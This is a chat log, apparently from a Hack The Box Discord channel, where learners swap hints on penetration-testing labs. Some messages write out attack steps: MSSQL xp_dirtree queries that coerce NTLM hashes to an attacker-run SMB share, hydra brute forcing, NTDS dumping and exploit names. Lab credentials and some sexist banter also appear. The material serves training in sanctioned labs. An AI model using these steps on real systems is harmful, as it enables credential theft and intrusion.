#modules
1 messages · Page 49 of 1
" Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer. "
Struggling here, here is the command I'm running, and I am getting 40
Thank you
Hello, I'm working on the Active Subdomain Enumeration module -> Active Subdomain Enumeration. I edited the /etc/resolv.conf to have "nameserver <Target_IP>" and /etc/hosts to have "<Target_IP> ns.inlanefreight.htb". However when doing the nslookup I do not get a second DNS zone? I only see 1 NS and for the life of me I cannot find a second DNS zone. Is there something wrong with these two configs (resolv/hosts) or am I just blind? Could you please give me a hint?
This task requires performing several steps:
Install curl on your Pwnbox if it is not already installed.
Open the terminal and run the following command to retrieve the source code of the website:
```bash
curl https://www.inlanefreight.com/ > source_code.txt
```
Use grep or another text manipulation tool to filter the unique paths of the domain. For example, using grep:
```bash
# the pattern has to match the whole URL, not just its first character
grep -o 'https\?://[^"]*' source_code.txt | sort | uniq > unique_paths.txt
```
To count the number of unique paths, you can use the wc (word count) command:
```bash
wc -l unique_paths.txt
```
The output of this command will be the number of unique paths.
source: openai.com
Interact with the target DNS using its IP address and enumerate the FQDN of it for the "inlanefreight.htb" domain. This is the question
I did that one! I got the FQDN
It's the zones that are bugging me
Identify how many zones exist on the target nameserver
I did the remaining ones but I'm not getting the first one
Which one are you stuck at?
The second one (Identify how many zones exist on the target nameserver. Submit the number of found zones as the answer.) and the third one (Find and submit the contents of the TXT record as the answer.). I can't seem to find the second zone?
I was in the Attacking Common Services hard lab. I used the execute() function but it's not giving me any results, so I used the EXEC command to open flag.txt on the administrator desktop. Can anyone figure out what the problem is?
dig axfr <subdomain>.inlanefreight.htb @rustic sageAddress
You'll get a flag
Is that trial and error or did you know?
I mean you can go past all subdomains, but is that best practice?
AH I think I get it now
If you don't mind, I'd like to edit this one so I don't spoil for others, mind if I edit it?
Wanna take it to DMs?
yeah
Hint: you don't need to count high
Hey, I need some help in the Footprinting module. I got stuck in the DNS section and couldn't find the answer to "Interact with the target DNS using its IP address and enumerate the FQDN of it for the "inlanefreight.htb" domain."
Dig?
I got some output through dig but none of them were the right answer
Did you dig with the ns option?
Because that will tell you the nameserver(s)
It's probably more obvious than you're thinking it is
Mhm if it's starting to look overly complicated always look back over your results
Attacking Web Applications with Ffuf
The problem I'm facing is that the host is not resolving from my /etc/hosts file.
It works with any standard IP, however as soon as I add the target IP to my /etc/hosts nothing wants to resolve it.
I've tried multiple solutions, however none of them work.
<standard IP> <name> works
<target IP> <academy.htb> doesn't
As a kicker as well, I can't ping the target IP. I can cURL the raw IP, however as soon as I assign it a DNS name in my /etc/hosts file, cURL doesn't want any of that.
Then don't assign it a DNS name
If it works just raw why change it?
Are you meant to use a specific name?
Because I need to access a subdomain on the same IP.
It's a module about VHOSTS and I require access to many names on one IP
I'm using the port as well though
it almost sounds like the hostname is wrong and the webserver is rejecting it
You specified the source port far after the --source-port
Try --source-port 53 then the rest
also rnd is not needed
Also did you just... Visit the IP?
:)
Also
-S
You don't need that
-S is telling nmap you want to spoof using the provided IP
That word is blocked: but yeah that is also it
You get access to the page /status.php iirc
Oh wait not the same thing
One sec
i wonder why crackmapexec couldn't crack the password but metasploit could..
Yeah no you get access to that page
I just looked at my notes for that one
I did this without nmap that's why lol
yo team... can somebody give me a hint on Attacking Common Services - Hard module please?
Maybe if you gave more context to your question
I have access to mssql and rdp of course, but I'm not able to continue as I didn't find a way to bruteforce the passwords of the found users or impersonate them... I also found a linked server but cannot check it
at the end I answer every question but last
Hint: ||mssql|| is the right path and one of the methods you mentioned is also right, so maybe re-check everything you have done or that didn't work
Are you using sqsh as the connection tool? I'm not sure if mine works so well...
Yep, and I did try with impacket-mssqlclient; both of them work fine for me
Hi
OK, I will try again. I found 2 users and when I try to impersonate one of them it doesn't work, and with the other user I get an error message that the user doesn't exist.. very strange. Thx for the hint
Hi
np, and if you still need help with that, shoot me a DM with the error message
thx
Hi, I'm a new user, please help me
with what?
With?
Are you a hacker?
this again
The original HackerTyper. Turning all your hacker dreams into pseudo reality since 2011.
Ho
Sometimes I go there and try to read the code to see if any of it makes sense 🤣
What's up kiddo just ask the question you're here for
Hello all, can someone please point me in the right direction for getting the DNS version in the medium lab for nmap? I am stuck with this command: sudo nmap -p 53 -sV 10.129.98.3 -sC -Pn -sU --source-port 53 and this result: 53/udp open domain NLnet Labs NSD
I mean the version is there
Sorry
Oh yeah, I didn't have time to address this issue yet, but if you are doing this through the VPN and you get nothing back (no flag), try it on the Pwnbox
thanks a bunch!
This
Good night
I'm Bangladesh
Ok bye
It worked via Pwnbox, thanks!
Refreshing your VPN connection can also get it to work (disconnect/reconnect)
can someone give me a nudge on Password Attacks Lab - Easy ?
You simply need the two lists that the module provides
I got the flag using Wireshark on my personal box on VPN, so that's also an option
I mean the module doesn't talk about using Wireshark, so that's why; using only tools given by the modules :)
I just reran it with one of the things I used and I got the flag in 3 things with nmap :D
not working ._.
Yeah, I was thinking "my nmap command should be working" and I opened up Wireshark to verify my claim
DM
sent
almost.....
Gl
Go go go!
Hey guys!
Could anyone recommend me any modules that can help me in studying reverse engineering? As far as I've looked I don't think I've seen any that touch that stuff in the academy, but maybe I'm missing something?
If there are none in the academy can anyone recommend a good source to study from? Also, I want that source to dive as deep as possible so I can master my knowledge before going in and solving stuff from the HTB challenges.
Thanks in advance!
A good starting point is maybe asm learning?
buffer overflow also
It is not reverse engineering but it can help to understand how a program works
I don't think there's really any geared for RE yet
The only module I can think of is Intro to Assembly Language
because the prerequisite for learning reverse engineering is knowing assembly
Will check it out, thank you!
Gotchu, makes sense hahah.
I'll start with that for now, thank you
Not sure if this will help but it's in #resources-tools so here
#resources-tools message
I'm not sure, but you may need to verify to access that channel
hi everyone
Has anyone done the blind SQL module? I'm trying to code a tool based on the module, but when I try to do a certain query and print it, it errors out
they're not gonna be able to see that link; they'll need to verify their htb account in #bot-commands
It's strange because the query to print out the flag works
but not the query to print a password
Was wondering if anyone could advise
I got that too, but it wasn't the right version. However, I think I used source-port 80, but the answer is still wrong.
Do you know why they are telling you to use source-port 53? If not, go back over the module
I just redid the module ran the same command I used previously and it worked just fine
Not in Academy, just the Assembly one. However, once you know assembly, you can go to the regular HTB site and do the RE challenges and look up any writeups people have done on some of them.
I got the flag in 3 ways looking at my command
but generally try in the pwnbox and you should get it
I forgot to mention that you may also want to look at anything malware analysis related because it requires reversing the code. An old book that is still good is "Practical Malware Analysis". It is a red book with an alien autopsy being done.
also look into John Hammond he regularly does content on Reverse Engineering Malware :) (using REMNUX, a Linux Distro focused on RE)
Don't know, use source-port 80 because port 53 is being filtered and port 80, which is the HTTP server, has to access port 53 to resolve. But I got the same version for the DNS as Taylor, and that wasn't the right answer. What command do you use Marcie?
I ran this but didn't work
try using the right source port
also -sC isn't necessary
also do a packet trace
just to see what's going on
:)
Shouldn't the source-port be 80? The hint says to look at that port.
It should be source-port 53, as that entire module talks about
Port 53 is the DNS port, which by default is trusted, as anything coming from that port is just trying to get transferred to/from another internal domain
Note: I just ran it twice, modifying my command slightly
don't need to specify source port
I'm basically just shortening what I have until it works
this is also the one where they give you access to the http://<IP>/status.php
Hi everyone, I've a problem with "Skills Assessment: Login Brute Force". Which file should we use? Ty
yeah using the shortest possible command I still get the answer; send me a DM because there might be something that's being overlooked
ok trying all variations of what I have: i would try disconnecting and reconnecting to the vpn; or resetting the target
as I adjusted my code multiple ways and variations
and even did --source-port 80
and was able to retrieve the flag
it didn't work.
It's getting a read timeout
Don't know why. I'll try restarting the machine.
ok
or swap servers and connect to the new vpn connection
Struggling on Case #11 in 'Bypassing Web Application Protections' of Sqlmap Essentials module. The hint isn't helping. Can anyone assist this pleb?
shit!!, I got it. I ran the same command after changing the VPN server and re-downloaded the VPN file.
somehow that works, so it seems it was the server i was using.
potentially
I am blaming it on Gremlins
anyway GL with the hard!
I already did the hard one yesterday when I was trying to figure out this one, and got that one fast.
yeah
sometimes the "hard" labs seem easier
but it's usually because the "medium" labs already prepped us mentally for what to look for
that is for sure.
Currently on Password Attacks - Credential Hunting in Linux. I already got the user's password, but only with the hint to help me get a first foothold. Can I get any help on what's the intended way of getting the first foothold? Think I have it, but goddamn would this take forever this way
thank you
I used the hint, but then I tried to recreate the steps as if I didn't have it. You can guess the username from an Nmap scan, and the password is in the rockyou list; it took me 20 minutes to do a brute-force scan with hydra.
Can anyone help me with Skills Assessment - Website ... I use good parameters with Hydra etc. But I can't find the wordlist ... (Password). Ty
I was stuck on "Enumerate hostname" for nmap. I had to read more into the documentation. I think I got my answer. It just goes to show that sometimes you need to punch in a line of code and then grab a coffee while you are at it
I'm working on the IPMI footprinting and when using hashcat I get this error: "Initializing backend runtime for device #1...Illegal instruction". Has anyone run into this? Online forums seem to be unhelpful
Hint: only ||1|| wordlist is needed for this
Hey y'all, I'm on Linux Fundamentals and I am doing the Service and Process Management section. I am trying to answer the question on what the unit name is of a service with "Load AppArmor profile etc..." I have used the cmd systemctl list-units and have found that service and the unit name with it, but when I put it into the answer I get it wrong
If you check in SecLists, 2 out of 4 ||darkweb2017|| lists have the right password
Can anyone please help me with 'Cracking Passwords with Hashcat' - Cracking Common Hashes section? I am getting MD2 for the hash but there is no MD2 mode for hashcat, and I have tried only cracking for MD2 with no success. MD5 isn't working either, and the hint of rule or hybrid mode isn't working either considering I am not sure of the mask.
No idea what you mean by that, but the ||deep scan|| tag seems to work for me
what's the issue?
Well I did not want to give away any spoilers. I read the Nmap documentation to find the answer to solving the problem
Hint for that: the hash isn't MD* and I think something like hashid can give you the right hash type. Also for this you will need a ||rule|| like the question said, but to find this ||rule|| you basically have to blindly try everything until you get a hit
I'm stuck on the Getting Started module, the privilege escalation part. I have already identified which exploit to use, however I ran into this issue: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.33' not found. Anyone know what I have to do to get this fixed? Like, do I need to compile the exploit on an older glibc version on my attack machine before transferring the exploit to the target machine?
hashid gives MD2 which isn't right; MD5 and MD4 haven't worked either.
Yeah, that's the first 3 and none of them are right
There is an example command in that section for listing services; you can just use that command and use the grep command with the given description in the question
@vital adder New problem
You do not have permission to use the bulk load statement.
i impersonated user john
So when I grep the description, would it look like this... systemctl list-units | grep "Load AppArmor profile managed internally by snapd"
No idea about the permission thing because I didn't use bulk, but hint: wrong user
Yes, your grep command is right but your systemctl command is missing 1 tag (not sure if you even need that tag or not, it's just in my notes)
So that is the unit name, correct?
--type=service, was that what was missing?
I put that in already
I found it a different way lol, way harder, had to look through all the services lol
but when I put that unit name in it says I'm wrong
No idea why, and also I got no note about this, but trying to remove the username ||admin:|| from the hash seems to fix it for me
Yeah, you may want to remove this because that's the right answer. Give the page a refresh or even a hard refresh and try again
No problem. I switched over to Kali and hashcat works on it no problem
remove the pic
Yeah, a lot of people randomly have issues with this hash for what seems like no reason
Sometimes it works just fine with both hashcat and john but sometimes it just doesn't for no reason, and I just gave it a try and it doesn't seem to work for me right now (on the Pwnbox)
I'm just having issues with Parrot.
That could be the issue
I've tried with ||b.gates|| and ||m.gates||... found in the preceding exercise. I don't know
are you on the first or second question?
first
"When you try to access the IP shown above, you will not have authorization to access it. Brute force the authentication and retrieve the flag."
So yep, my first hint still applies
and you don't need to find a ||username|| for this
So what username am I going to use? :/ ..
Hint: you don't, and there are only 4 main sections in this module, so go back and check each one of them for this
Hi
umm
Good morning
Can you help me out with the module called Vulnerability Assessment
How am I supposed to scan for the Nessus activity
Is there anyone online at the moment
......
.....
..
....
I know I missed someone in my last helping spree and I did double check; no idea how tf I still missed your message, but if you are in the Privilege Escalation section then hint: you don't need to compile anything, but if you want to test a newer PrivEsc exploit (which this target has) you can just compile it on your machine and transfer it to the target machine
Can I PM you with what I found to avoid spoilers here?
@cunning void spamming isn't going to help, rather just say what issue you are having (deleted this the first time on accident)
sure
I'm confused because I am following the module exactly.
The command just kinda stops immediately
I need help :(
I am just confused on how to do the activity they provided for Nessus in the Vulnerability Assessment module
I thought they have Nessus preinstalled on their server, so I SSH-ed into it and I tried running {systemctl start nessusd.service}
but it was not working
What section? Should be straightforward
The version shown in the example is 5.0.2dev and the version on the Pwnbox is 5.4.1 (I think it's the latest), and it seems to be working on my Kali which is running version 5.2.2
So use a different version??? Like, I'm really frustrated because the Attacking Common Services module wasn't working, so I switched to the Password Attacks module lol
Nessus Skills Assessment section
The latest crackmapexec has some dumb updates; one of them is when you dump the ntds, in the dumped file they add some dumb account status stuff, so if you want to use that to continue other stuff you have to filter the stupid status thing out, which isn't that bad but it's annoying
So how should I go about using an older version?
Both modules are buggy and kinda old, also a bit outdated 🤣
Yes, but if you can, use it on a different machine like on your Kali (if you have one); uninstalling and re-installing this type of tool is a nightmare
I just download and use the pre-installed VM from Kali 🤣
Are these sections from Password Attacks (dumping SAM, LSASS, NTDS, pass the hash, pass the ticket) the exploitation, post-exploitation or lateral movement phase?
I haven't been able to make any CPTS progress recently cuz the modules have been buggy
@raven cairn oh wait, I'm dumb, you can just install an old version of cme by overwriting the current one with:
sudo pip3 install 'crackmapexec>=5.2.2,<5.4.1' --force-reinstall
@shadow canopy lateral movement
Yo thanks funny internet squirrel
np, also I can't remove my Christmas hat because I can't find the original image without the hat 🤣 (I'm 100% sure it's still on my laptop somewhere)
Thanx
You need to RDP into it, not SSH, and for convenience's sake the scans were already done; you just need to navigate to IP:8834 and then look for the stuff
I've also been resetting the box to make sure that things are working
Yeah, the dumb update in the new version is the only issue I can think of
Also give me a sec, I'll reset both my Pwnbox and target and re-try everything to see if it still works
No problemo. I really appreciate the help : )
@raven cairn I just gave it a try with basically the same thing with the install command and it's also working fine for me, and I did have doubts about the command I sent because when I was trying to install old crackmapexec I ran a bunch of commands and didn't check which worked; I just sent the last command I ran
and yep, it was the right command that installs an old version of crackmapexec, and that old version seems to be working fine for me
It do be like that
Yeah, my guess is you may have broken something when trying to debug cme (if you did), but the pip install thing should overwrite the old one and install everything needed, so that shouldn't be an issue
But like I said before, the Pwnbox (kinda) sucks ass
So this is just a nice way to say I am dumb lol
Honestly idk
The Documentation and Reporting module is taking me so long lol. Feel like my notes are like a novella compared to my more technical section notes. Hurts too that it's boring but super critical info.
Like, I haven't ever seen this when I am using smbclient, but at this point I am not sure if I don't know what I am doing, or this section is broken.
Like, don't get me wrong, it's an absolutely amazing module and I'm hella grateful it's there. It's just also the complete antithesis of everything I find interesting and it musters all of my willpower to properly learn it.
Whoever made the Pivoting module, I love him/her
I did, maybe so ☺️
Then I hate you
Nah, it's one of the easiest modules I ever did but I HATE YOU cuz you used the gayest emoji that could ever exist on Discord
Wtf! How was I supposed to know you're male?!
There are females here too, jsyk
They are just males in disguise: no such thing as females on the internet
Gosh! Sucha heartless MarcieLee
YEAH
So, if a lady becomes a hacker, she unknowingly becomes a man, really?
It's a running internet joke
Since way back when
Due to the presence of catfishing and stuff
Haven't seen a lady hacker in my entire life
Cope
btw are you preparing for cpts?
Yes
Would you mind if I DM you?
Yes, I mind. :) Don't
Alright then LMAO
marcie do you have oscp?
Nope
Is the CPTS a very valid certification as a Pentester
It's not widely industry recognized ATM; it's valid, but OSCP is still the HR dropper
I've seen quite a few pentest positions that say 'OSCP or equivalent', so while CPTS might not hit recruiter keywords yet, I'd expect that it'd probably be respected at any place you end up getting an interview.
I'd say CPTS surpasses OSCP from what people have said
Why do you think so?
More modern content that goes far more in depth in exploitation as well as having a much greater emphasis on methodology. It also has one of the best beginner into intermediate AD modules of any course. It more appropriately prepares you for the actual real life job of being a junior pentester.
Or at least thats been the general consensus so far
Recently I passed the CPTS exam by HackTheBox. In this video I discuss my experience with the course and exam, as well as how it differs from the OSCP.
HTB Discord: https://discord.com/invite/hackthebox
Chapters:
0:00 Introduction
0:29 The Course
3:35 The Exam
5:38 The Report
8:11 Tips & Tricks
11:46 FAQ: How does CPTS compare to OSCP?
18:55 O...
My review of the new @HackTheBox Certified Penetration Testing Specialist (CPTS) certification - Hope you enjoy #HackTheBox #HTB #CTF #Pentesting #OffSec #CPTS #Certification #Course
• Social Media ‣
Twitter: https://twitter.com/_CryptoCat
GitHub: https://github.com/Crypto-Cat
HackTheBox: https://app.hackthebox.eu/profile/11897
LinkedIn: https:...
So how much can we rate HTB with respect to its certifications?
Considering the main site has some contracts with companies and is certified as a CE service
So far people really like CPTS over its competition for its target skill levels, but its still too new for industry recognition
OSCP will help you land interviews, CPTS will help you pass interviews
No, by far CPTS is cheaper. But price is not the same as quality
Can someone give me a nudge on Password Attacks Lab - Hard?
Can someone give me a hint on where to find the SAM database? I tried many answers that I know and none of them is correct
Look in system
If you want to dump it you can also use crackmapexec
Thank you so much! I'll make sure to check those out, that seems very in-depth 💪
Can anyone give me a nudge on Attacking Common Services - Hard
I got john's pass but I don't know how to get the admin priv.
@brisk geode maybe I may help you
I did all the exercises but I have a problem with the first question which states "Where is the SAM database located in the Windows registry? (Format: **)"
dms?
@brisk geode yes
Isn't it like C:\Windows\System32\somethingsomething?
@livid zephyr @fathom pendant actually this is one that I think I found already, but also great info!
There's a course in tryhackme, that focuses on malware analysis, so I'll take it.
Thank you
can I dm you?
Yeah sure
The "Blind SQL Injections" module was very fun.
If you still need help, send me a DM
Hello guys! Can I DM someone to get help with the Pivoting module? Thanks
Glad you enjoyed
sure
Hi HTB dudes.
Hope you guys have a happy day!
I have questions regarding the markup box.
Why couldn't I get the SSH key of the Daniel machine after I ran the payload?
I got 200 OK responses from the HTTP request through Burp Suite.
Does anyone have a solution on this please share.
Big thanks
You always ask the same question and still in the wrong channel
#modules message
Maybe this will help you
https://medium.com/@joemcfarland/markup-has-been-pwned-e7c6e763d25f
Thanks for your reply. Yes I followed the scripts there. However I still have the same issues.
Any idea maybe this is the cause of the burp suite community edition?
Of the htb machine itself. Or the remote machine ?
Planning to use vm just to see if my VM machine has the same result.
Finishing "Active Directory Enumeration & Attacks" feels so good. It was endless D:
How long did this module take you? I plan to start it soon
Like a week and a half. Also, I'm studying in parallel (aside from HTB) and that's why it took me more time. But it has many, many sections. Definitely takes more than 2 days (as suggested on the webpage)
Yeah, took me about 10 days too
Need help on the Enumeration with Nmap module, service enumeration section.
I've enumerated and found all the services but idk how to proceed further
I've found the flag from one of the services but that is meant for a later part
I need help with the Getting Started "privilege escalation" second question. I get to the SSH key and don't know what to do from then onwards
Which question are you in?
the last one
service enumeration section
"Enumerate all ports and their services. One of the services contains the flag you have to submit as the answer."
this is the question
Try nc to the port you are interested in
You could also try the banner script of nmap
thanks
The times listed for each module assume you are spending 8 hours a day studying.
i spent way more than 16 hours on that module
granted I'm not super good at this but still
Password Attacks
Pass the Ticket (PtT) from Windows
Optional: Try to use both tools, Mimikatz and Rubeus, to perform the attacks without relying on each other. Mark DONE when finish.
I am able to do everything with Mimikatz. However, I'm trying to use Rubeus (Rubeus.exe dump /nowrap); the base64 output doesn't decode with CyberChef and online decoders
Anyone know how to decode the strings?
Even with 8 hours a day and assuming you are being trained through the Path, it's impossible in 2 days if you really want to understand and test everything in that module. If you are an experienced pentester and you try that, OK, "2 days". But for someone who's new there's no way to do that in 2 days. Also, 'not' being 2 days is not even a thing. I'm just saying that the webpage says 2 days but it's way longer than that
I agree. I'm just pointing out what the numbers are based on
Kerberos tickets are not human readable.
It won't look like it decoded properly no matter what you do
So (Rubeus.exe dump /nowrap) is just to extract info: users, domain, etc.
But how can I use the base64 string to pass the ticket with Rubeus.exe?
Can I get a nudge on Network Enumeration with Nmap, Firewall and IPS/IDS Evasion medium lab?
Hi
Pivoting, Tunneling, and Port Forwarding>> ICMP Tunneling with SOCKS
any solution?
Anyone wish to nudge me in the right direction on Attacking Common Services - Easy lab?
How did you find the ilf_admin page?
Don't forget that TCP isn't the only type of communication
I was stuck on that one for a while too!
hello, can somebody tell me what is the IP address of academy.htb ?
That's not a "real" FQDN, i.e. it's only used for exercises. You can edit your hosts file to match the IP address of the exercise VM, but that address will be specific to your session.
Have you compiled the binaries?
$sudo ./autogen.sh
yeah i did
Maybe this tip will help:
I had the same issue, solved installing autoreconf:
sudo apt install autoreconf
https://forum.hackthebox.com/t/icmp-tunneling-with-ptunnel-ng/268732/8
You can look in /etc/hosts
I am stuck.
The top-level domain htb is not official and therefore cannot be resolved.
But you can enter the IP address of your target in the hosts file.
10.10.10.10 academy.htb
The IP of your target
Do you know the port number?
Can anyone tell me why running EternalRomance at the target host returns 'Exploit completed, but no session was created.'. The info only set RHOSTS, which I did as well. Why does the module have a remote session and I don't? I tried both exploits (the code and command version)
did you set LHOST?
I don't have that option (I checked options)
Payload options? Try both staged/stageless payloads
It's not under 'Basic Options'
I have: DBGTrace, Leakattempts, namedpipe, named_pipes, rhosts, rport, service (3 of them), share, smbdomain, smbpass, smbuser
Do I set LHOST in the options after 'use 0', for instance?
Where is #giveaway ?
is there an issue with the https://academy.hackthebox.com/module/77/section/843 module?
It was this, thank you! Why did it not say anything about this in the module lol
I can't enumerate anything on the port. Also there were no plugins installed when I used wpscan
Just because wpscan does not find anything does not mean that there are no plugins installed. Look in the source code
Right, I know what the website says when browsing it. The servers are not responding all of a sudden.
I think you must be verified to see #giveaways
Alright thanks
Restart the Lab and try again
You do not need a VPN for this address
try enumerating version numbers
||Wordpress 5.6.1|| then ||Simple Backup Plugin 2.7.10|| ||twentytwenty theme||
Search for public exploits with this information
Good evening, during a box I encountered a VHD file encrypted with BitLocker. I cracked it, but the question is how can I mount such a file. I tried to follow a guide using guestmount but that brought me no mount.
||wp_simple_backup_file_read||
I was just having issues with the server. Would not work, thought there might be an outage
Hi, could anyone give me a hint for the module "Attacking Common Services - Hard"? I've gained access to ||fiona and have mssql, but when I try to execute hash stealing as john (impersonating) I'm getting stuck; I've tried Responder and impacket's smbserver||
||[*] Incoming connection (10.129.203.10,49703)
[*] AUTHENTICATE_MESSAGE (,WIN-HARD)
[*] User WIN-HARD\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] Closing down connection (10.129.203.10,49703)
[*] Remaining connections []||
This is the query:
||EXECUTE AS LOGIN = 'john' EXEC master..xp_subdirs '\\10.10.15.95\share'||
||EXECUTE AS LOGIN = 'john' EXEC master..xp_dirtree '\\10.10.15.95\share'||
@acoustic owl @cinder mortar thank you
Have you found the || linked server? ||
i didnt read
yes, but i'm getting ||[-] ERROR(WIN-HARD\SQLEXPRESS): Line 1: Linked servers cannot be used under impersonation without a mapping for the impersonated login.||
sounds like you're not using appropriate creds
Oh I used the wrong connection for the ||linked server||
did this
||EXECUTE AS LOGIN = 'john' EXECUTE('EXEC master..xp_subdirs ''\\10.10.15.95\share''') AT [WINSRV02/SQLEXPRESS]||
instead of
||EXECUTE AS LOGIN = 'john' EXECUTE('EXEC master..xp_subdirs ''\\10.10.15.95\share''') AT [LOCAL.TEST.LINKED.SRV]||
But still struggling with || no hashes on the responder||
Module Pivoting, Tunneling, and Port Forwarding - Skills Assessment. I need help on question 5, i have the creds for user vfrank but when I connect to 172.16.6.35 i get nothing. can someone help me out? thanks
You're looking for another host to connect to using vfrank creds
hi @storm jackal can i dm you about the Pivoting, Tunneling, and Port Forwarding module?
yeah
You can't intercept a hash with responder in this lesson
So I'm trying to do the linux fundamentals. I'm connected to the VPN and can ping the target machine, but when I try to SSH to it nothing happens until it tells me my connection timed out.
using web proxies, Intercepting Responses
where can i change the type. in burp itself or with the help of the developer tools? i tried both but didn't find out yet...
Ey! I am a bit stuck: In the Footprinting module under DNS we are supposed to: interact with the target DNS using its IP address and enumerate the FQDN of it for the "inlanefreight.htb" domain.
I have tried every type of DNS lookup with DIG from an A record to a SOA. I assumed I would find the FQDN in an A record, but there is nothing that looks like a FQDN, any advice?
What do you mean by "change the type"?
i should change the type from number to text...but i can't overwrite it in burp and neither with the developer tools
like, in a request?
you want to modify a request?
If you want to modify a request, in burp do the following:
right click on the request you want to modify and click "send to repeater"
Go to the "repeater tab", here you are able to modify the request and send it by clicking "send"
You can't efficiently do it with dev tools, but you can download insomnia, right click the request in dev tools > networking and click "copy as CURL" then paste it into insomnia
yes normally when i work with burp i do exactly as you said. send it to the repeater and then modify the request and send it again
and that worked?
but here i would have to modify the response...u know what i mean
You can't modify the response, you are not the server
You can only modify requests and send those
and how i do that?
OOO now I see your question, you want to modify the HTML source code in your browser
Open dev tools and go to "inspector", now double click on the field you want to change, it should highlight and you should be able to write whatever you want
looks like a potential injection to me. Try inserting values on the page, but before you click the submit button on the web page, make sure your burp is set to intercept the requests. Then when you capture it, you can modify it.
funny it works in every browser but not in the browser provided by burp...
thanks for your help.
aaaa, I never use the burp browser so it didn't strike me that you were using it. np, happy hacking!
To list the DNS servers of a domain, there is another command. Not dig A but dig || NS ||
Hi, I have just started hackthebox I am at the starting point, and when I launch my machine on the kali terminal, it is not the same IP as the one on the HTB machine. If anyone can help me please
ty! already found the answer
Not sure what you mean? The target machine shouldn't have the same IP as your tun0 address
I've found some tables with creds, but that also got me nowhere for now but will keep on, thanks for the hint, since I won't be wasting any more time with the responder
||b'patric' b'password' b'user'
b'julio' b'password' b'admin' ||
so if I understand correctly, when you run ifconfig in the terminal, the IP address that appears is not the same as the one targeted on htb
Cheers, pwned 
Struggling really hard with SQLMap Essentials - Bypassing Web Application Protections: Case#11. Can I pm someone or someone pm me for help? Tried so many different flags and variations with '--tamper=', but nothing is returning.
pff that password - Hard is really hard. Found a SAM and System, dumped the hashes and cannot manage to login with pass the hash. really slamming my head into the desk now.
tomorrow i will try if invoke the hash works...
been finding the entire password module a thing of extremes. it's either super obvious and just follow along with the content, or "here's a brick wall. try to break it with your face"
ahw man losing much time on that hard machine
It shouldn't be
yes I understood and it works well thx
Hello everyone, was someone able to crack the root hash on
the Password Attacks - Passwd, Shadow & Opasswd Module?
Probably
Anyone have trouble with the answer syntax on Footprinting - Host Based Enumeration - SMB exercise questions 1 and 6?
1.) What version of the SMB server is running on the target system? Submit the entire banner as the answer.
6.) What is the full system path of that specific share?
I'm confident that I've found the information required for the questions, but I can't seem to format it correctly for submission.
Got 6.. had an extra / at the end lol
Still stuck on 1 tho?
I got it lol TIL... when service scanning for SMB, do ports 135,139,445 not just 139,445
Is this error with smbclient normal? (password attacks module - Network section)
I think ls is the wrong command.. try dir
Dir gives me the same error
Recent pwnbox updates might have screwed some stuff up but I am not sure
That's odd ya one of those two should work
I don't really have a virtual machine and it's hard for me to set one up cuz I am at the university all day and I don't think I can set up kali on those computers
I was having some issues with pwnbox earlier today too. I was luckily able to utilize a VM though
Hi!
Hello. Welcome to hackthebox. Have you had a chance to checkout #rules ?
Yes, I've been here for days now, but I'm hardly talking hehe
I'm having trouble with the footprinting DNS module, I've tried most of the word lists now but both the target and the pwn box expire before the enumeration completes, I'm starting to get frustrated
Sweet!
If you need help with any modules lmk
Thx
i forgot what the shares with the $ exactly are but it's windows default stuff so you can't access those shares
I haven't been able to access any of the shares shown with CME tho
oh yeah i forgot this section is a bit messy and kinda buggy, let me do some tests or find my old notes on this stuff and i'll get back to you, but some users may have something that you just can't access because it's all on the same box
Could someone point me in the right direction with DNS footprinting please
if you use the tool shown in the example and one of the bigger wordlists in seclists you should be good. also hint: running the tool on the ||main domain|| is the ||wrong path||
Someone for "Active Directory Enumeration & Attacks" part "Privileged Access" ? have a question
sure what's the question?
Right it's a Host key word being Host
@raven cairn ok yep i just gave it a quick try and it seems like ||all valid users|| have the same share but only the "right" user has access to it (the user for the smb question). this is kinda dumb but if you want to find it with cme just use --continue-on-success and don't use the given username list for this
I swear I can read
Module: Password Attacks
Section: Password Attacks Lab - Hard
Issue: I've found the || .vhd || file and tried smbmap to 'get' however the transfer is taking a significant amount of time i.e. - I ran the transfer overnight and it was only half done when I checked. Are there efficient alternative methods to download the file to || mount, enumerate and crack offline ||
How can I establish a foothold on Attacking Common Services - HARD? I've been testing against rdp & the mssql services mainly utilizing my least favorite method "Brute forcing"...using the resources given & rockyou...yet no luck. Any Guidance?
Like this?
nope you still need a username wordlist (not the given one) so hint you have to ||make your own||
hint enum
try with the pwnbox and i'm not sure but i think you should be able to mount the share as a drive on your machine but no idea if you can run tools against it that way
Cheers, I'll check it out
oh wait a sec why tf are you using smbmap?
no idea if you can download file with that tool or smbclient will download it faster but just use smbclient
smbclient threw an error, tried a couple of times. looked around for help and someone suggested smbmap, it at least progressed past the error. I'll try smbclient in my VM again and if not I'll explore using the pwnbox
Hint still went over my head... Enum What? Im drawing blanks against what ive tried
also if you don't want to brute force (with 2 wordlists), since you should have access to the target machine you can just compare the ||share name|| with ||some user||
did you scan the target machine? hint ||smb||
if you are doing this on your machine the file has to go through a vpn and that will make it slow as hell, but if you are doing this on the pwnbox it should be super quick because both the pwnbox and the target machine are in the same network
Makes total sense, smbclient timeout again so I'll fire up the pwnbox and give it a go
Hi, kinda stupid question but I was reading the Using Web Proxies module, in particular the Proxying Tools section and I can't get nmap to work with burp, I've tried both with --proxies http://127.0.0.1:8080 and with proxychains but no requests show up on burp. proxychains works both with curl and metasploit
I did but i didn't see smb 0.0 I'll rest and scan again
Oh. That was very sneaky of the authors.
proxychains is a routing tool so basically it routes traffic through a proxy server and burp just stays in the middle to listen and log stuff. so if you are trying to get proxychains to work with burp that's kinda dumb and i'm not sure if burp can listen and log the traffic from nmap because burp is only for web stuff but i think it should
but wireshark is a much much better thing to use if you want to log nmap traffic than burp
Now on to the password mutations section
This section needs to be updated so badly : (
yeah I thought about that too I was just doing it to follow the module but I just didn't understand why it didn't work on my computer but it does in the module example
I guess it's because they work on different layers
Thank you @vital adder
I can't post in help area
I am having trouble connecting to starting point vpn, I've been trying for 2 days to connect and i get the same error every time,
" $Option error: In [CMD-LINE]:1: Error opening configuration file: " that's the error in my terminal when I try to connect
verify your account and ask that in #starting-point
ok thanks
hello
hello
They actually teach this in a module. Good way to analyze malware
Just don't hear about this typically, I never did until the module
Do you do command: proxychains nmap restofcommandhere
